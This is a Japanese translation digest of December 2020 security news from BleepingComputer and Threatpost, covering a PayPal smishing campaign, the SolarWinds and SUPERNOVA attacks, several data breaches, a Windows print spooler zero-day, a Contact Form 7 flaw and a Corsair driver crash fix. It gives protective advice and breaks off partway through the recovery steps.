     "PayPal: We've permanently limited your account, please click link below to verify,"(PayPal: 我々は永久的にあなたのアカウントを制限した。確認するには、以下のリンクをクリックしなさい)と、スミッシング テキストは表示している。
     以下に示したように、囲みの中にあるリンクをクリックすると、フィッシングページに飛ばされアカウントにログインするよう促される。

    PayPalスミッシング テキストと飛ばされるページ(画像をクリックすると拡大表示されます)

     フィッシングページにログインすると、入力されたPayPal認証は脅威のアクターに送信される。このフィッシングページは、更に次のステップに進み、あなたの名前、誕生日、住所、口座情報などを含む詳細を収集しようとする。

    犠牲者から個人情報を収集(画像をクリックすると拡大表示されます)

     収集された情報は、あなたの他の口座へのアクセスを獲得したり、標的型スピアフィッシング攻撃を実行するための、なりすまし攻撃を実行するために使用される。
     昨日、私の知り合いの二人が、このようなフィッシングテキストを受け取った。これは大変活動的なキャンペーンなので、誰もがこれらのメッセージに注意する必要がある。
     スミッシング詐欺は、人気あるものとして増加中なので、リンクを含むあらゆるテキストメッセージを疑わしいものとして処理することは常に重要である。全てのフィッシングeMail同様に、疑わしいリンクをクリックするのではなく、必ず、そのメインサイトのドメインを訪問し、あなたのアカウントに問題があるか否か確認しなさい。

    このリンクに情報を入力した場合、何をすべきか

     このテキストメッセージを受取、誤ってPayPalアカウントにログインしたり、他の情報を提供した場合は、直ちにPaypal.comに行きパスワードを変更しなさい。
     他のサイトでも同じパスワードを使用している場合には、そこも同様にパスワードを変更しなさい。
     最後に、提出したデータを使用した別の標的型スピアフィッシングに注意しなさい。BleepingComputerは、クレジットレポートを監視し、不正な口座があなたの名前で作成されていないことを確認するように提案する。
     なりすまし詐欺を防ぐには、クレジットレポートを一時的に凍結して、銀行や他の会社があなたの名前でクレジットを発行するのを防ぐこともできる。


    SolarWindsハッカーは、Microsoftのソースコードにアクセスしていた
    BleepingComputer : News>Security(2020/12/31)
     SolarWinds攻撃の背後にいる脅威のアクターは、Microsoft製品のソースコードを閲覧できる内部Microsofstアカウントをセキュリティ侵害していた可能性がある。
     今月始め、Microsoftは、彼らの環境中でSolarWinds Orionプラットフォーム サプライチェーン攻撃の間にダウンロードされた悪意ある実行可能ファイルを検出したことを確認した

    SolarWindsサプライチェーン サイバー攻撃(画像をクリックすると拡大表示されます)

     本日公開されたブログへの投稿で、Microsoftは、プロダクションサービスや顧客データが漏洩していた(偽造されたSAMLトークン(【訳注】 Security Assertion Markup Language)はService ProviderとIdentity Provider の 2 つの企業間の行われる認証と許可のための XML ベースのフレームワーク(Auth0より))が彼らのドメインに対して使用されていた、あるいは、彼らのシステムが顧客を攻撃するために使用されていた)という証拠は発見されなかったと述べていた。
     しかしながら、Microsoftの調査は、この攻撃が内部Microsoftアカウントをセキュリティ侵害でき,  そのアカウントでMicrosoftのソフトウェアのソースコードを閲覧するために使用できる可能性を発見した。しかし、この攻撃者は、あらゆるソースコードやエンジニアリングシステムを改竄するために要求されるパーミッションを所有していない。
     「我々は、少数の内部アカウントで尋常でない行動を検出した、検証したところ、あるアカウントが、幾つかのソースコード リポジトリ中のソースコードを閲覧するために使用されていたことを発見した。このアカウントは、いかなるコードもエンジニアリングシステムも改竄するためのパーミッションを所有していなかった。我々のさらなる調査は、いかなる変更も実行されていないことを確認した。これらのアカウントは調査され、正しく設定された」と、Microsoftはブログポストで述べている
     Microsoftは更に、セキュリティ上からの難読化は実行しないと、ソースコードの閲覧をセキュリティリスクと考えていないと述べている。


    Adobeは、Windows 10でFlash Playerをアンインストールするように警告を開始
    BleepingComputer : News>Security(2020/12/30)
     Flash Playerは明日(12/31)公式に終焉を迎える。Adobeは、ユーザがFlash PlayerをアンインストールするようWindowsコンピュータで警告を表示することを開始した。
     Flash Playerがインストールされるとき、以下のコマンドを実行する'Adobe Flash Player PPAPI Notifier'と名付けられたスケジュールタスクが作成される。
    "C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_465_pepper.exe" -update pepperplugin

     このコマンドが実行されると、このコマンドは、Adobe Flash Playerへの謝辞を述べ、次に、終焉が迫っているのでこのプログラムをアンインストールするように推奨する警告を現在表示している。

    Windows10に表示されたAdobe Flash Playerの警告(画像をクリックすると拡大表示されます)

     あなたがコンピュータ上で積極的にFlashコンテンツを使用している場合を除き、Flash Playerを、動作しなくなるまで待つのではなく、直ちに削除するように強く推奨する。
     Flash Playerは常時セキュリティリスクがあったが、Adobeが2017年にAdobe Flashの終焉をアナウンスして以来、殆どのサイトと内部アプリケーションはAdobe Flashから立ち去っている。

    Flash Playerの設定によって制御されているAdobe Alert

     今年Adobeは、アンインストール推奨アラートを表示しないようにすることを可能にする'EOLUninstallDisable'と呼ばれる新しいFlash Player設定オプションを導入した
    "EOLUninstallDisable = [ 0, 1] (0 = false, 1 = true)

    EOLUninstallDisableのDefault値は 0 である。これはアンインストール推奨アラートを表示する。この値を 1 に設定すると、Flash Playerのアンインストールを求めるAdobeのおせっかいなプロンプトは表示されなくなる。
    Adobe Flash Playerは明日(12/31)終焉を迎える。Flashコンテンツは、この設定の如何を問わず2021年01月12日に動作しなくなる。
    今まで述べてきたように、マシン上でFlashコンテンツを使用しないのであれば、避けられないことをわざわざ遅らせる必要はない、直ちにFlash PLayerをアンインストールしなさい。

    【訳者補足】Flash Player と Shockwave Player のアンインストール方法に関してはこちら


    SolarWinds: 新しいSUPERNOVAマルウェアに関するアドバイザリをアップデート
    BleepingComputer : News>Security(2020/12/26)
     SolarWindsは、この企業のネットワーク マネージメント プラットフォームを介して拡散する更に追加されたSuperNovaマルウェアに関するアドバイザリのアップデート版をリリースした。
     今月始め、SolarWindsは、脅威のアクターが、正当なSolarWinds Orion SolarWinds.Orion.Core.BusinessLayer.dll DLLファイルを、悪意あるSUNBURSTバックドアを含むように改竄したサイバー攻撃で被害を受けたことを明らかにした。次に、このファイルは、サプライチェーン攻撃中で自動アップデート機能を介してSolarWindsの顧客に拡散した。
     SolarWindsセキュリティ侵害を解析した後、Palo Alto Unit 42Microsoftは、App_Web_logoimagehandler.ashx.b6031896.dllDLLファイルを使用して拡散するSuperNovaと名付けられた更に追加されたマルウェアをレポートした。このマルウェアは、ハッカーが、このマルウェアによってコンパイルされたC#コードを遠隔から送信し、犠牲者のマシン上で実行することを可能にする。

    実行ファイルにコンパイルされたSuperNovaコード(画像をクリックすると拡大表示されます)

    MicrosoftとPalo Alto Unit 42は、この更に追加されたマルウェアは、最初のSolarWindsサプライチェーン攻撃の一部であったSUNBURSTトロイを拡散させたグループとの関係性はないと確信している。

    SolarWindsはアップデート版のアドバイザリをリリースした

     火曜日、SolarWindsは、SUPERNOVAマルウェアに関する情報と、SolarWinds Orionネットワーク マネージメント プラットフォームがこれを拡散した方法に関する情報を含むアップデートされたアドバイザリをリリースした。
     「SUPERNOVAマルウェアは、2つのコンポーネントで構成されていた。一つは悪意あるもので、SolarWinds Orion Platform上で使用できるように特別に記述された未署名のWebシェル .dll(“app_web_logoimagehandler.ashx.b6031896.dll”)であった。2つめは、悪意あるコードの拡散を可能にするためにOrion Platform中の脆弱性を悪用するものである。Orion Platform中のこの脆弱性は、最新のアップデートで修正された」と、SolarWindsのアップデート版アドバイザリは説明している。
     SolarWindsは、SUNBURST脆弱性だけでなくSUPERNOVAマルウェアからも防御するために、全てのOrion Platformの顧客に対し最新のバージョンへのアップグレードを勧告している。
     このアップデートは現在、以下のバージョンとパッチを含むOrion Platform用に提供されている。
      ・ 2019.4 HF 6 (2020/12/14にリリース)
      ・ 2020.2.1 HF 2 (2020/12/15にリリース)
      ・ 2019.2 SUPERNOVA Patch (2020/12/23にリリース)
      ・ 2018.4 SUPERNOVA Patch (2020/12/23にリリース)
      ・ 2018.2 SUPERNOVA Patch (2020/12/23にリリース)
     既に2020.2.1 HF 2や2019.4 HF 6バージョンにアップグレードしている顧客は、SUNBURSTとSUPERNOVA脆弱性は解決されているので、更なるアクションは要求されない。


    コーエイテクモ(Koei Tecmo)は、ハッカーが盗み出したデータをリークした後に、データ漏洩を公開した
    BleepingComputer : News>Security(2020/12/26)
     日本のゲーム開発会社コーエイテクモは、盗まれたデータがハッカーフォーラムに投稿された後に、データの漏洩を公開し、ヨーロッパとアメリカのWebサイトをオフラインにした。
     コーエイテクモは、仁王2、ゼルダ無双・厄災の目次録、ライザのアトリエ、Dead or Aliveなどを含む人気あるPCとコンソール ゲームで知られている。
     12月20日、脅威のアクターは、従業員に送信したスピアフィッシングを介して、12月18日にkoeitecmoeurope.com Webサイトをハッキングしたと主張した。この攻撃の一部として、65,000のユーザがいるフォーラムデータベースを盗み、アクセスを継続させるためにこのサイト上にWebシェル(【訳注】Web経由でのコマンド実行を可能にするバックドアの一種(トレンドマイクロ・セキュリティプログより) )を植え付けたと、この攻撃者は主張している。
    「私が発見したこのシェルにはFTP証明書が存在している、そして、このシェル並びに、彼らが所有するTwitterアカウント用の複数のTwitterシークレットを購入するのであれば、これらを喜んで共有するだろう」と、この脅威のアクターは、セールストークの中で述べている。
     ハッカーフォーラムでの投稿で、この脅威のアクターは、フォーラムデータを0.05Bitcoin(約1,300$)、Webシェルアクセスを0.25Bitcoin(約6,500$)で販売しようとしていた。
     12月23日、同じ脅威のアクターは、同じハッカーフォーラムにおいてデータベースを無料でリークした。

    無料でリークされたコーエイテクモのデータベース(画像をクリックすると拡大表示されます)

     BleepingComputerが確認したこのデータベースのサンプルは、フォーラムメンバーのeMailアドレス、IPアドレス、ハッシュされたパスワードとソルト、ユーザ名、誕生日、国名を含んでいる。

    コーエイテクモはWebサイトをオフラインにした

     データがリークの通報を受けた後、コーエイテクモはアメリカ(https://www.koeitecmoamerica.com/)とヨーロッパ(koeitecmoeurope.com)のWebサイトをオフラインにし、以下のメッセージを表示している。
     
    当Webサイトへの外部攻撃の可能性に伴い、この問題を調査している間、当該Webサイトを一時的に閉鎖いたします。

    オフラインになったコーエイテクモ アメリカのWebサイト(画像をクリックすると拡大表示されます)

     攻撃を認識して以来、コーエイテクモは、英国子会社(以下、KTE)Webサイト上のフォーラムがセキュリティ侵害され、盗まれたデータがオンライン上にリークされたとするデータ漏洩アドバイザリをリリースした。
     「KTEの運営するホームページ中のコンテンツである「Forum」に登録されたユーザー情報、約65,000 件が流出している可能性があると判断しております。詳細には、ユーザー情報のうち、「任意のアカウント名」と、「パスワード(暗号化された状態)」、「メールアドレス」が、ハッキングにより流出した可能性があると認識しております」とコーエイテクモはデータ漏洩アドバイザリ(英国子会社における情報流出に関するお知らせ(第2報))で表明している。
     コーエイテクモは、影響を受けたのはフォーラムだけであり、このサイトの他の部分は影響を受けていないと述べている。コーエイテクモはまた、金融情報はこのデータベース中に格納されていないとも発言している。
     このゲーム企業は、「身代金要求型マルウェアの可能性は低い」と判断しており、当社並びにKTEへの要求行為、脅迫行為などは確認できていないとしている。
     このゲーム企業は、「身代金要求型マルウェアの可能性は低い」と判断しており、当社並びにKTEへの要求行為、脅迫行為などは確認できていないとしている。
     コーエーテクモは、十分な注意を払い、この攻撃の調査中に英国子会社KTEを内部ネットワークから切り離した。
     コーエーテクモは、今年サイバー攻撃を受けた最初のゲーム開発者ではない。
     今年の初め、CrytekとUbisoftはEgregorランサムウェアに見舞われCapcomは、RagnarLockerランサムウェア攻撃を受けて1TBのデータが盗まれている。


    不完全な修正であったためWindows 0-Dayは依然として残っている
    ThreatPost: Security News(2020/12/24)
     Microsoftの不適切なパッチのために、デスクトップを完全に乗っ取ることのできる深刻度-重要に分類されるWindowsの0-Dayの危険性は、依然として残っている。
     Windows 8.1とWindows 10(CVE-2020-0986)中のローカル特権昇格のバグはPrint Spooler API中に存在している。6月に発行されたMicrosoftのアドバイザリによると、この問題は、ローカル(【訳者補注】権限でログオンした)攻撃者が特権を昇格し、現在のユーザ コンテキストでコードを実行することを可能にするものである。攻撃者は最初にシステムにログオンする必要があり、次に、影響を受けたシステムの制御を取得するために特別に細工されたアプリケーションを実行することができる。
     「Windows カーネルがメモリ内のオブジェクトの適切な処理に失敗した場合に発生する」と「攻撃者によりこの脆弱性が悪用された場合、カーネル モードで任意のコードが実行される可能性がある。攻撃者は、その後、プログラムのインストール、データの表示、変更、削除などを行ったり、完全なユーザー権限を持つ新たなアカウントを作成したりする可能性がある」と、Microsoftは発言している。
     このバグは、CVSS脆弱性深刻度分類で8.3(最大値10)と評価されている。
     より技術的な観点からは、「この特定のフローは、ユーザモード プリンタドライバー ホストプロセスsplwow64.exe中に存在している」と、「この問題は、ユーザーが指定した値をポインターとして逆参照する前に、それが適切に検証されていないことが原因である」と、昨年12月にMicrosoftにバグを報告したTrend MicroのZero Day Initiative (ZDI)のアドバイザリは述べている。
     この問題は、6ヶ月間未パッチのままであった。その間にも、Kasperskyは、5月にオンライン上でこの脆弱性がInternet Explorer中のリモートコード実行の0-Dayのバグを使用したエクスプロイト チェーンの一部として韓国の企業に対して悪用されていたことを観察している。Operation Powerfallと呼ばれるこの作戦は、Darkhotelとして知られるadvanced persistent threat (APT、持続的標的型攻撃)として開始されたと思われていた。
     Microsoftの6月のアップデートは、「Windows カーネルがメモリ内のオブジェクトを処理する方法を修正することによって、この脆弱性を解決する」とするパッチを含んでいた。しかしながら、Google Project Zeroの研究者Maddie Stoneは、この修正は不完全であったことを現在公開している(この問題の警告後、90日の猶予期間中に再パッチが失敗したので)。
     「Microsoftは6月にパッチをリリースしたが、このパッチは、この脆弱性を修正していない」と、「9月(90日の猶予期間内)に、酷い修正であることをレポートしたが、この問題は依然として修正されていない」と、水曜日に彼女はツイートしている。
     更に、「この問題の源は、攻撃者が、memcpy関数(【訳注】 指定バイト数分のメモリをコピーする関数)へのsrc(コピー元のメモリブロックのポインタ)とdest(コピー先のメモリブロックのポインタ)のポインタを制御することを可能にする任意のポインタ逆参照であった。この’修正’は、単純にこのポインターにオフセットを付けるように変更しただけだったので、memcpy関数の引数を制御することは依然として可能である」と、彼女は追加している。
     Microsoftは新しいCVE(CVE-2020-17008)を発行した。そして、研究者達は1月のパッチに期待している。その一方で、Project Zeroは、この問題に関する概念の実証コード(proof-of-concept code)を公開した。


    NetGalley(ネットギャリー)は、Webサイトがハッキングされデータが漏洩したことを発表した
    BleepingComputer : News>Security(2020/12/24)
     NetGalley書籍宣伝サイトは、脅威のアクターがメンバーの情報の存在するデータベースにアクセす可能なデータ漏洩を被っていた。
     NetGalleyは、著者と出版社が彼らの書籍(ゲラ)の電子批評コピーを書籍の支持者、影響力のある読者、業界の専門家にプロモートし、読者にその書籍を推奨することを期待するWebサイトである。
     12月21日(月)、NetGalleyのWebサイトは、ハッキングされ汚損された。さらなる調査の後、脅威のアクターが、メンバーのデータを含むこのサイトのデータベースのバックアップにアクセスしていたことも判明した。
     「我々は、12月21日(月)、NetGalleyがデータセキュリティ重大事案の犠牲者になったことを皆様に通知することを大変残念に思う。当初、我々のホームページは単純な汚損であると思われたが、更なる調査で、NetGalleyデータベースのバックアップファイルへの非認証・非合法アクセスと結論付けられた」と、NetGalleyはデータ漏洩アドバイザリで公開した。
     このバックアップデータベースは、NetGalleyメンバーの個人情報(ログイン名、パスワード、名前、eMailアドレス)を含んでいる。このデータベースに存在している可能性のある他のオプショナル情報には、ユーザのメールアドレス、誕生日、企業名、Kindle eMailアドレスが含まれる。
     NetGalleyは、このデータベース中には金融情報は存在していないと述べている。データ漏洩の対応において、NetGalleyは、全てのユーザに、次回ログインしたときにパスワードを変更するよう要求している。
     BleepingComputerは、NetGalleyにパスワードがデータベース中でハッシュされていたか否か問い合わせたが、回答はなかった。

    NetGAlleyユーザが実行すべきこと

     NetGalleyのメンバーであるのなら、直ぐにサイトにログインしパスワードを変更しなさい。  他のサイトでもNetGalleyのパスワードを使い回しているのであれば、そのパスワードをそのサイト用の一意で強力なパスワードに変更しなさい。  全てのサイトで一意のパスワードを使用することは、あるサイトでデータ漏洩があっても、あなたが使用している他のサイトが影響を受けることを妨げることになる。
     全てのサイトでの一意で堅牢なパスワードを記録する手助けとして、パスワードマネージャを使用することを推奨する。


    SolarWindsハッカーは、米国財務省当局者のeMailアカウントを晒した
    BleepingComputer : News>Security(2020/12/22)
     米国上院議員Ron Wydenは、多くの米国財務省eMailアカウントがSolarWindsハックの背後にいる脅威のアクターによって晒されたと発言した。
     この声明は、米国財務省並びに米国内国歳入庁(IRS)がSolarWindsサプライチェーン攻撃に関して委員会のスタッフにブリーフィングした後に発表された。
     IRS自体や納税者のデータが、現在進行しているハッキングキャンペーンの一部としてセキュリティ侵害されたという証拠は存在していないが、この上院議員は「財務省へのハッキングは重大であるように思われる」と発言している。

    多くのの財務省eMailアカウントが晒された

     「財務省のスタッフによると、財務省は7月以降、深刻なセキュリティ侵害に見舞われたが、その詳細は不明である」と「Microsoftは、多数のeMailアカウントが漏洩したと財務省に通知した」と、上院財政委員会のメンバーであるWydenは発言している。
     この上院議員はまた、SolarWindsのハッカーが、米国財務省の部門別オフィース(「その省の最高位にランクされる」部門)のシステムもセキュリティ侵害していたと追加している。
     「財務省は依然として、ハッカーが実行したアクションのすべてを、厳密には、どのような情報が盗まれたのかを認識していない」とWydenは付け加えている。

    (画像をクリックするとRon WydenのTwitterにジャンプします)

    財務省秘書官Steven Mnuchinもまた、財務省がハッキングされたことに関して質問されたとき、機密システムがセキュリティ侵害された証拠は未だ発見されていないと、CNBC(【訳注】 ニュース通信社ダウ・ジョーンズとアメリカの大手テレビネットワークのひとつNBCが共同設立したニュース専門放送局(Wikipediaより))に告げていた。  「幸いなことにダメージはなく、多大な情報が移動されたことも確認されなかったと告げるだろう」と、Mnuchinは発言していた。
     
    最後に、数年に渡り、政府関係者が暗号バックドアを主張し、暗号化キーはハッカーにとって魅力的なターゲットであると発言したサイバーセキュリティのエキスパートの警告を無視し続けた後、連邦政府は現在、練達のハッカーに連邦政府サーバから暗号化キーを盗まれたと思われるセキュリティ侵害を被った 。 上院議員Ron Wyden

    SolarWindsの犠牲者の数は徐々に増えている

     SolarWindsサプライチェーンセキュリティ侵害が発見された後、FireEye, Microsoft, VMwareを含む複数の組織は、ハッカーによって侵害されたことを公開した。
     Microsoftは、40を超える彼らの顧客のネットワークが、現在進行中のこの一連の攻撃で侵害されたことを発見している。その80%は米国であり、44%はIT部門である。
     しかし、FireEyeだけは、この攻撃の第二段階のターゲットにされ、この攻撃(UNC2452としてFireEyeに、Dark HaloとしてVolexityに追跡されている)を指揮している脅威のアクターによってシステムから情報を盗まれた。
     フォーレンシック(【訳注】 セキュリティ事故発生時に原因究明などのためにコンピュータに残された証拠を調査すること(NRI Secureより))エビデンスの調査に従い、新しい情報が明らかになるたびに、SolarWindsハックで攻撃された組織の既知のリストは、徐々に増加している。
     現時点で、ネットワークが侵害されたことを確認した米国の州および政府機関は以下を含んでいる。

     セキュリティ研究者とサイバーセキュリティは、このマルウェアのドメイン生成アルゴリズムをクラックした後、週末に渡って幾つかのSolarWinds犠牲者リストを共有した。


    ハッカーは、27万Ledger暗号通貨Walletユーザから盗んだeMailとメールアドレスを公開した
    Threatpost : News(2020/12/22)
      ・ Ladgerハードウェアウォレットの詳細は、スカマーにとって絶好の機会を提供する。
      ・ スカムは、身代金が支払われない場合には、顧客のhomeにセキュリティ侵害する脅威を含んでいる。
     Ladger仮想通貨ハードウェアウォレットの27万を超える顧客の電話番号、eMail、郵便宛先は、ハッキングフォーラムから無料でダウンロード可能になっていた。
     Ladgerニュースレターを購読している100万を超える人々のeMailアドレスが付属しているこの情報は、元々は2020年6月に、この企業がセキュリティ侵害されたことにより犯罪者の手に落ちたと信じられている。
     当初は、犯罪者によって人気のある地下ハッキングフォーラムで販売されていたが、現在、このデータは無料で利用可能である。
     そして必然的に、多くの悪意あるパーティーが、不注意な人々を欺き、Ladger顧客から脅し取ることを企てるために、この情報を悪用しようとする可能性があることを意味している。
     このような攻撃は、既に定期的に発生している。
     例えば、今月始め、Bleeping Computerは、Ledgerの顧客がLedger Liveソフトウェアの新しいバージョンをインストールし、彼らのPINをリセットする必要があるとする漏洩情報eMailを受け取っているとレポートしている。
     しかし、見た目と違い、このeMailは実際にLedgerから来たものではなく、疑うことを知らないユーザをウォレットユーザのリカバリフレーズとシークレットパスフレーズ(セキュリティ レイヤーを有効にしている場合には)を盗むためのWindows用のLedger Liveのインチキ バージョンに差し向けるためにサイバー犯罪者によって送信されたものである。
     このような情報で、攻撃者は、ユーザの暗号通貨ファンドへの完全なアクセスを取得することができる。
     本日、Ledgerは、この企業のサーバーから漏洩した情報を使用して受信者のhomeに侵入しない条件として、攻撃者が身代金500$を要求していることを確認したとする他のスカムに関する警告を顧客に行った

    (画像をクリックすると拡大表示されます)

       記述している時点で、Ledgerは、ここ2ヶ月で171のフィッシングサイトをシャットダウンしたと発言している。Ledger顧客ベースに関連するデータが自由に利用可能になっていることから、ユーザをターゲットにしているフィッシングサイトの数は増えるばかりである。
     Ledgerは、この企業を装うインチキの通信を受け取ったユーザは、それを彼らにレポートするように依頼している。
     Ledgerは、ユーザのデバイスを決して非アクティブにすることはない(疑いを持たないユーザーに不適切な決定を下すように欺くような脅威を実行するフィッシング攻撃は珍しいものではない)と、この企業が、テキストメッセージや電話で顧客に接触することは決してないと強調している。
     しかし、おそらく最も重要なことは、ユーザーはリカバリフレーズの24語を「いかなる状況でも誰とでも」共有してはならないとLedgerが述べていることである。 シークレットリカバリフレーズは、Ledgerのデバイス自体でのみ入力する必要がある。さもなければ、あなたが保持している暗号通貨は、あなたの指をすり抜ける可能性がある。


    500万WordPressサイトが、攻撃にオープンになっているContact Form 7プラグインを実行している
    Threatpost : News(2020/12/18)
     Contact Form 7と呼ばれる人気のあるWordPressのプラグインのパッチが火曜日にリリースされた。このパッチは、認証されていない敵が、このプラグインを実行しているWebサイトを乗っ取る、もしくは、そのサイトをホストしているサーバ全体をハイジャックすることを可能にする緊急のバグを修正している。このパッチは、Contact Form 7プラグインのアップデート バージョン5.3.2の形式で出現している。
     このWordPressユーティリティは、500万Webサイトでアクティブであり、それらのサイトの大部分(70%)は、バージョン5.3.1及び、それ以前のContact Form7プラグインを実行している。
     この緊急の脆弱性(CVE-2020-35489)は、この脆弱性を水曜日に発見したAstra Security Reserchによると、unrestricted file upload bug(無制限ファイルアップロードのバグ)に分類されている。

    素早い修正

     Astraによると、「このプラグインの開発者(Takayuki Miyoshi)は、その重大な性質を理解し、この脆弱性を素早く修正した。我々は、あらゆる脆弱性攻撃を防ぐために可能な限り早急にアップデートをリリースることを試みるために相互にコミュニケーションを取り合った。この問題を修正するアップデートは、バージョン5.3.2として既にリリースされている。」
     このフローを特定したとされるバグハンターJinson Vargheseは、この脆弱性は認証されていないユーザがContact Form 7の全てのフォーム ファイルタイプ制限をバイパスすることを可能にしており、バージョン5.3.1及び、それ以前のプラグインを実行しているサイトに対して実行可能形式のバイナリをアップロードすることができると記述している。
     次に、この敵は、多くの悪意ある行為(Webサイトを書き換えたり、訪問者をサードパーティのWebサイトにリダイレクトし、訪問者に個人情報や財務情報を渡すように企てる)を実行することができる。
     研究者によると、ターゲットにされたWebサイトを乗っ取ることに加えて、WordPressのインスタンスをホストしているサーバーでコンテナ化が行なわれておらずWebサイトを分離していない場合には、攻撃者はまた、そのサイトをホストしているサーバーをハイジャックすることもできる。

    悪用のしやすさ

     「これは、簡単に悪用できる。そして、攻撃者は認証される必要はなく、攻撃はリモートで実行することができる」と、Astraのディジタル マーケティング担当者でありグロースハッカー(【訳注】 ユーザーから得た製品やサービスについてのデータを分析し、改善してマーケティングの課題を解決していく職種(ferretより))Naman RastogiはThreatpostのe-Mailインタビューで発言している。
     彼は、Contact Form 7のアップデートは、現在リリースされていると発言している。「WordPressプラグインを自動アップデートにしているユーザは、自動的にアップデートされる。それ以外の人々は、積極的に手動アップデートすることが要求される」と、彼はThreatpostに告げている。
     このバグ関する展望に関して、Webアナリスト企業Netcraftは、今WordPressプラットフォームを使用しているWebサイトは4億5500万存在していると見積もっている。これは、WordPressサイトの1.09%が、このフローを介しての攻撃に対して脆弱性があることを示唆している。


    Windows 10 Updateが、CorsairVBusDriver BSODクラッシュループを発生
    BleepingComputer : News>Security(2020/12/18)
     Microsoftの2020年12月のWindows 10アップデートは、Corsair Utility Engineソフトウェアとコンフリクトし、オペレーティングシステムをBSOD(Blue Screen of Deth、死のブルースクリーン)クラッシュループを発生させている。
     2020年12月のパッチの水曜日にアップデートがリリースされた後、Windows 10のユーザは、オペレーティングシステムがクラッシュループ(Windowsが再起動、自動的にクラッシュ、再び再起動)するとする報告を開始した。
     Windows 10がクラッシュすると、以下の画像に見られるように"Stop code - SYSTEM THREAD EXCEPTION NOT HANDLED"エラーとCorsairVBusDriver.sys drive failedと記したブルースクリーンを表示する。

    CorsairVBusDriver.sys Blue Screen of Deathクラッシュ(画像をクリックすると拡大表示されます)

     Microsoftは、最新のWindows 10アップデートに関する、如何なるサポート速報でもこのコンフリクトを認識していないが、まもなくWindows 10アップデートのセーフガードを発動することを、我々は期待している。
     人々は、12月8日以来CorsairVBusDriver.sysクラッシュに関して不平を言い続けているが、本日、BleepingComputerは影響を受ける人が急増していることを確認した。MicrosoftがCorsairドライバに関するオプショナル アップデートを提供しているが、これは、我々が確認している急増の説明をつける可能性があるので、このドライバはインストールするな。 BleepingComputerは、これらクラッシュに関するいくつかの質問をMicrosoftにしている。

    Windows 10 CorsairVBusDriver.sys BSODクラッシュの修正方法

     このクラッシュの影響を受けたのであれば、Windowsをブートすることはできなくなる。それ故、我々はWindows 10回復環境(Recovery Environment)を使用してコンフリクトしているCorsairVBusDriver.sysをリネームもしくは削除する必要がある。
    方法1、 回復環境(Recovery Environment)でCorsairVBusDriver.sysドライバをリネームする

     CorsairVBusDriver.sysクラッシュを修正する最も簡単な方法はWindows 10を回復環境(Recovery Environment)でブートし、このドライバをリネームすることである。
     CorsairVBusDriver.sysドライバをリネームするには、以下のステップに従いなさい。

    、 Windows 10をリカバリ スクリーンで起動する(ブート方法はこちら(リンクはMicrosoftの日本語サイトに変更)を参照、但し、「スタートアップ設定」ではなく「コマンドプロンプト」を選択する)。【訳注】 ブート情報や詳細な画像が必要な方は、こちらこちらを参照してください。
    、 「その他の修復オプション」をクリック
    、 「トラブルシュート」をクリック
    、 「詳細オプション」をクリック
    、 「コマンドプロンプト」をクリック
    、 コマンドプロンプトで、diskpartとタイプし、Enterを押す
    、 list volとタイプし、Enterを押す。これで、ドライブレターのリストと各ドライブのパーティション サイズを確認できるはずである。通常のC:\ドライブとサイズが一致するドライブレターを探し、そのドライブレターを書き留める。

    (画像をクリックすると拡大表示されます)

    、 exitと入力し、Enterを押し、Diskpartユーティリティを終了する
    、 C:ドライブに関連付けられているドライブに変更する。例えば、上図に示したdiskpartでは、そのドライブレターは、D である。コマンドプロンプトで、D を入力し、Enterを押す。【訳注】 上図のVolume 1 C System Reseは、system-reserved (システムで予約済み領域)なので、ここで選択するドライブではありません。
    10、 新しいドライブに切り替わったら、dirとタイプし、Enterを押す。Windowsフォルダがあったら、あなたは正しいドライブ中に存在している
    11、 ここで、cd \windows\system32\driversとタイプし、Enterを押す。注意: コマンドラインの、cdと\windowsの間には半角スペースを入力する。
    12、 現在、[drive-letter]:\Windows\system32\driverプロンプトになっているはずである。このプロンプトで、ren corsairvbusdriver.sys corsairvbusdriver.sys.bak とタイプし、Enterを押す。下図のようになる。

    CorsairVBusDriver.sysドライバをリネーム(画像をクリックすると拡大表示されます)

    13、 ドライバをリネームした時にエラーが発生しなかった場合には、exitと入力し、Enterを押す。これで、コマンドプロンプトが終了する。
    14、 コンピュータを再起動するために続行(Continue)オプションをクリックし、Windows 10をブートする。
    15、 Windows 10にログインしたら、Corsair Utilityソフトウェアをアンインストールしなさい。

    方法2、 回復環境(Recovery Environment)を使用してこのドライバをアンインストールする

     BleepingComputerのメンバーは、これらのクラッシュを解決する方法に関する詳細なステップを親切にも作成し、それを我々のフォーラムに投稿している。私は、コマンドプロンプトに精通していない人々がより理解しやすいように、このステップを多少修正した。
     Windows 10 CorsairVBusDriver.sys BSODを解決するには、以下のステップに従いなさい。

    、 これらのステップを実行するためにWindowsインストールディスクを必要としない。代わりに、Windows 10組み込みのリカバリ コマンドプロンプトを使用して実行することができる。  1-1、 Windows 10リカバリ スクリーンでブートする(ブート方法はこちら(リンクはMicrosoftの日本語サイトに変更)を参照、但し、「スタートアップ設定」ではなく「コマンドプロンプト」を選択する)。【訳注】 ブート情報や詳細な画像が必要な方は、こちらこちらを参照してください。
       1-2、 「その他の修復オプション」をクリック
       1-3、 「トラブルシュート」をクリック
       1-4、 「詳細オプション」をクリック
       1-5、 「コマンドプロンプト」をクリック

    、 コマンドプロンプトに入ったなら、Windows System Partitionをマウントする必要がある(これは自動的にマウントされない)
       2-1、 コマンドプロンプトで、diskpartとタイプし、Enterを押す
       2-2、 list diskとタイプし、Enterを押す。これで、サイズと共に幾つかのディスクの出力結果を見るだろう。通常、システムドライブは、Drive 0 である。あなたはドライブのサイズで大体推測がつくだろう。  2-3、 select disk xと入力し、Enterを押す。x は、ステップ2-2の結果で判別されるシステムドライブの値で置き換えなさい。
       2-4、 list partとタイプし、Enterを押しパーティションのリストを確認する。通常のWin 10インストールは、4つのパーティションを持っている。パーティション: 1 - Recovery, 2 - System, 3 - Reserved, 4 - Primaryである。あなたがPrimaryパーティションを発見できないのであれば、ステップ2-3に戻り、diskを変更しなさい。あなたがPrimaryパーティションを発見するまで、この操作を繰り返しなさい。
       2-5、 Select part x とタイプする。x は、あなたのPrimary Partitionの値(ステップ2-4で最大のパーティションのはずである)で置き換えなさい。
       2-6、 assign letter=Zとタイプし、Enterを押す。これで、Primary Partitionにドライブレター(Z)が割り当てられる。
       2-7、 exitとタイプし、Enterを押す。これで、diskpartが終了する。

    、 ここで、dismコマンドを使用して、この危なっかしいドライバを削除する必要がある。
